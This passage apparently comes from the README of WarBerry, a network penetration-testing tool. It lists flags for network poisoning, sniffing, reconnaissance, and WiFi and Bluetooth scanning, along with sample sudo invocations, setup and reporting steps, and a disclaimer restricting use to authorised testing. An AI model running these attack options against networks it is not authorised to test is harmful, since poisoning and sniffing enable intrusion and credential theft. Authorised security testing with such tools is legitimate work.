  -N NAME, --name=NAME                  Hostname to use. Default: Auto
  -i INTENSITY, --intensity=INTENSITY   Port scan intensity. Default: T4
  -Q, --quick                           Scan using threats. Default: Off
  -P, --poison                          Turn Poisoning on/off. Default: On
  -H, --hostname                        Do not Change WarBerry hostname Default: Off
  -e, --enumeration                     Disable Enumeration mode. Default: Off
  -M, --malicious                       Enable Malicious only mode. Default: Off
  -B, --bluetooth                       Enable Bluetooth scanning. Default: Off
  -r, --recon                           Enable Recon only mode. Default: Off
  -W, --wifi                            Enable WiFi scanning. Default: Off
  -S, --sniffer                         Enable Sniffer only mode. Default: Off
  -C, --clear                           Clear previous output folders in ../Results
  -m, --man                             Print WarBerry man pages


example usage: sudo python warberry.py -a -T                Attack all TCP Ports
               sudo python warberry.py -r                   Use only the recon modules
               sudo python warberry.py -H -I wlan0          Use the wlan0 interface and dont change hostname
               sudo python warberry.py -I eth0 -i -T3       Use the eth0 interface and T3 scanning intensity
               sudo python warberry.py -I eth0 -N HackerPC  Use the eth0 interface and change hostname to HackerPC

Installation

Run sudo bash setup.sh

Reporting

Download the /RESULTS folder into /var/www, /Library/Webserver/Documents/ or XAMPP web directory depending on your OS and setup.

Download the warberry.db file locally and save it into Reporting/ .

Change file Config.php under Reporting/WarberryReporting/SQLiteConnection/php to use the correct path of warberry.db

Run index.html under Reporting/

Disclaimer

This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.